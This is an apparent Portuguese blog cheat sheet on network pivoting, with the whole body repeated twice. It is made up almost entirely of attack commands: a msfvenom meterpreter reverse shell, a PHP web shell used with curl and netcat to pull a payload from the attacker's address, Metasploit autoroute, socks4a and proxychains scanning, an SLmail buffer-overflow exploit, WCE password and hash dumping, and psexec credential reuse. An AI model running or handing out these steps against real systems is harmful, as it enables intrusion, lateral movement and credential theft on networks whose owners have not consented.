Visão geral
Pivoting refere-se à prática de cortar um computador em rede ou um servidor e, em seguida, usando esse host para atacar outros sistemas de computador dentro da rede. Ao lançar ataques de dentro da rede, o atacante ignora política de firewall e pode executar ataques que não seriam possíveis de fora da rede. Ao utilizar um sistema comprometido para lançar ataques a partir de, o atacante tem uma melhor perspectiva de permanecer despercebido e pode deixar menos de uma impressão digital.
Ferramentas
msfconsole -: https://www.offensive-security.com/metasploit-unleashed/msfconsole/
msfvenom -: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
netcat -: https://nmap.org/ncat/
curl -: http://curl.haxx.se/
socks4a -: https://www.rapid7.com/db/modules/auxiliary/server/socks4a
proxychains -: https://github.com/rofl0r/proxychains-ng
nmap -: https://nmap.org/
seattlelab_pass -: https://www.rapid7.com/db/modules/exploit/windows/pop3/seattlelab_pass
wce-universal -: http://www.ampliasecurity.com/research/wcefaq.html
psexec -: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
xfreerdp -: https://github.com/FreeRDP/FreeRDP
Falha joomla
http://resources.infosecinstitute.com/exploiting-cve-2015-8562-new-joomla-rce-2/
PDF
Penetration Testing with Kali Linux -:
Tunneling Pivoting Web Application Penetration Testing -:
Obs:
Abra as porta no seu modem,
Comandos
Criando shell com msfvenom
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=porta -f elf > output
Enviando uma shell via netcat com shell.php
$ nc -lvp PORTA < shell
$ curl --silent http://target.com/shell.php?cmd=nc%20SEU_IP%20PORTA%20%3e%20shell
source shell.php <?php system($_GET['cmd']); ?>
Iniciando postgresql
/etc/init.d/postgresql start
Iniciando msfconsole para receber conexao
$ msfconsole -r resource.rc -q
code resource.rc
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST SEU_IP
set LPORT PORTA
set ExitOnSession false
exploit -j -z
Conectando uma sessão
msf > sessions -i numero da sessão
Ver e a adicionar rotas
meterpreter > route
meterpreter > run autoroute -s subnet/24
meterpreter > run autoroute -p
Execulatndo socks4a
meterpreter > background
msf > use auxiliary/server/socks4a
msf > run
Editando proxychains.conf
$ nano/etc/proxychains.conf
edit a ultima linha para socks4 127.0.0.1 1080
Visualizar portas forwards
$ netstat -nlpt
Fazendo um scanner com proxychains e nmap na subnet
$ proxychains nmap -v -sT -Pn subnet/24
Habilitando forward para porta filtradas
use uma sessão
meterpreter > portfwd add -l LOCAL_PORTA -p PORTA_FILTRADA -r IP_TARGET
Usando exploit para SMAIL com Buffer Overflow
msf > use exploit/windows/pop3/seattlelab_pass
msf > set RHOST IP_TARGET
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LPORT PORTA
msf > set LHOST SEU_IP
msf > exploit
Upando wce para um servidor windows
use um sessão em um windows
meterpreter > upload /usr/shere/wce/wce-universal.exe c:\
Execulatdo o WCE para pegar hash ou senhas em cache
meterpreter > shell
cd \
# wce-universal.exe -w -: para senhas em cache
# wce-universal.exe -: para hashs
Usando exploit psexec para uso de credenciais
msf > use exploit/windows/smb/psexec
msf > set RHOST IP_TARGET
msf > set SMBPass
msf > set SMBUser
msf > set SMBDomain
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST SEU_IP
msf > set LPORT PORTA
exploit
Usado xFreeRDP
xfreerdp /v:IP_TARGET /u:username /p:password /d:domain /w:800 /h:600
VIDEO
Pivoting refere-se à prática de cortar um computador em rede ou um servidor e, em seguida, usando esse host para atacar outros sistemas de computador dentro da rede. Ao lançar ataques de dentro da rede, o atacante ignora política de firewall e pode executar ataques que não seriam possíveis de fora da rede. Ao utilizar um sistema comprometido para lançar ataques a partir de, o atacante tem uma melhor perspectiva de permanecer despercebido e pode deixar menos de uma impressão digital.

Ferramentas
msfconsole -: https://www.offensive-security.com/metasploit-unleashed/msfconsole/
msfvenom -: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
netcat -: https://nmap.org/ncat/
curl -: http://curl.haxx.se/
socks4a -: https://www.rapid7.com/db/modules/auxiliary/server/socks4a
proxychains -: https://github.com/rofl0r/proxychains-ng
nmap -: https://nmap.org/
seattlelab_pass -: https://www.rapid7.com/db/modules/exploit/windows/pop3/seattlelab_pass
wce-universal -: http://www.ampliasecurity.com/research/wcefaq.html
psexec -: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
xfreerdp -: https://github.com/FreeRDP/FreeRDP
Falha joomla
http://resources.infosecinstitute.com/exploiting-cve-2015-8562-new-joomla-rce-2/
Penetration Testing with Kali Linux -:
Tunneling Pivoting Web Application Penetration Testing -:
Obs:
Abra as porta no seu modem,
Comandos
Criando shell com msfvenom
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=porta -f elf > output
Enviando uma shell via netcat com shell.php
$ nc -lvp PORTA < shell
$ curl --silent http://target.com/shell.php?cmd=nc%20SEU_IP%20PORTA%20%3e%20shell
source shell.php <?php system($_GET['cmd']); ?>
Iniciando postgresql
/etc/init.d/postgresql start
Iniciando msfconsole para receber conexao
$ msfconsole -r resource.rc -q
code resource.rc
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST SEU_IP
set LPORT PORTA
set ExitOnSession false
exploit -j -z
Conectando uma sessão
msf > sessions -i numero da sessão
Ver e a adicionar rotas
meterpreter > route
meterpreter > run autoroute -s subnet/24
meterpreter > run autoroute -p
Execulatndo socks4a
meterpreter > background
msf > use auxiliary/server/socks4a
msf > run
Editando proxychains.conf
$ nano/etc/proxychains.conf
edit a ultima linha para socks4 127.0.0.1 1080
Visualizar portas forwards
$ netstat -nlpt
Fazendo um scanner com proxychains e nmap na subnet
$ proxychains nmap -v -sT -Pn subnet/24
Habilitando forward para porta filtradas
use uma sessão
meterpreter > portfwd add -l LOCAL_PORTA -p PORTA_FILTRADA -r IP_TARGET
Usando exploit para SMAIL com Buffer Overflow
msf > use exploit/windows/pop3/seattlelab_pass
msf > set RHOST IP_TARGET
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LPORT PORTA
msf > set LHOST SEU_IP
msf > exploit
Upando wce para um servidor windows
use um sessão em um windows
meterpreter > upload /usr/shere/wce/wce-universal.exe c:\
Execulatdo o WCE para pegar hash ou senhas em cache
meterpreter > shell
cd \
# wce-universal.exe -w -: para senhas em cache
# wce-universal.exe -: para hashs
Usando exploit psexec para uso de credenciais
msf > use exploit/windows/smb/psexec
msf > set RHOST IP_TARGET
msf > set SMBPass
msf > set SMBUser
msf > set SMBDomain
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST SEU_IP
msf > set LPORT PORTA
exploit
Usado xFreeRDP
xfreerdp /v:IP_TARGET /u:username /p:password /d:domain /w:800 /h:600
VIDEO
Comentários
Postar um comentário